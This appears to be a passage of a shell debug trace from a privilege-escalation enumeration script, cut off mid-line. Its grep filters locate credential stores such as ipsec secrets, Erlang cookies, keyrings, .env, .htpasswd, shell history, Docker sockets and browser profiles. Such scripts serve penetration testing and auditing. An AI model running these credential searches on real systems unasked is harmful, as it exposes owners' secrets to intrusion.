+ PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70)
+ PSTORAGE_ERLANG=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70)
+ PSTORAGE_GMV_AUTH=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_IPSEC=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "\.irssi$" | sort | uniq | head -n 70)
+ PSTORAGE_KEYRING=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70)
+ PSTORAGE_FILEZILLA=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70)
+ PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70)
+ PSTORAGE_SPLUNK=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "passwd$" | sort | uniq | head -n 70)
+ PSTORAGE_GITLAB=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/lib' | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70)
+ PSTORAGE_PGP_GPG=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E 'README.gnupg' | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70)
+ PSTORAGE_CACHE_VI=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70)
+ PSTORAGE_DOCKER=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$|dockershim\.sock$|containerd\.sock$|crio\.sock$|frakti\.sock$|rktlet\.sock$" | sort | uniq | head -n 70)
+ PSTORAGE_FIREFOX=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^" | grep -E "\.mozilla$|Firefox$" | sort | uniq | head -n 70)
+ PSTORAGE_CHROME=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^" | grep -E "google-chrome$|Chrome$" | sort | uniq | head -n 70)
+ PSTORAGE_OPERA=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^" | grep -E "com\.operasoftware\.Opera$" | sort | uniq | head -n 70)
+ PSTORAGE_SAFARI=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^" | grep -E "Safari$" | sort | uniq | head -n 70)
+ PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_FASTCGI=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "fastcgi_params$" | sort | uniq | head -n 70)
+ PSTORAGE_SNMP=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_PYPIRC=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "\.pypirc$" | sort | uniq | head -n 70)
+ PSTORAGE_POSTFIX=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "postfix$" | sort | uniq | head -n 70)
+ PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_PRIVATE\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "\.cloudflared$" | sort | uniq | head -n 70)
+ PSTORAGE_HISTORY=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E ".*_history.*$" | sort | uniq | head -n 70)
+ PSTORAGE_HTTP_CONF=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "httpd\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_HTPASSWD=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "\.htpasswd$" | sort | uniq | head -n 70)
+ PSTORAGE_LDAPRC=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "\.ldaprc$" | sort | uniq | head -n 70)
+ PSTORAGE_ENV=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "\.env$" | sort | uniq | head -n 70)
+ PSTORAGE_MSMTPRC=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "\.msmtprc$" | sort | uniq | head -n 70)
+ PSTORAGE_INFLUXDB=$(echo -e "$FIND_CONCOURSE_KEYS\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_BIN\n$FIND_USR\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_SYSTEMD\n$FIND_SRV\n$FIND_LIB64\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_CDROM\n$FIND_CONCOURSE_AUTH\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SNAP\n$FIND_LIB32\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^/private|^/sbin|^/media|^$GREPHOMESEARCH|^/srv|^/tmp|^/opt|^/usr|^/applications|^/bin|^/.cache|^/etc|^/snap|^/cdrom|^/var|^/mnt" | grep -E "influxdb\.conf$" | sort | uniq | head -n 70)
+ PSTORAGE_ZABBIX=$(echo -e 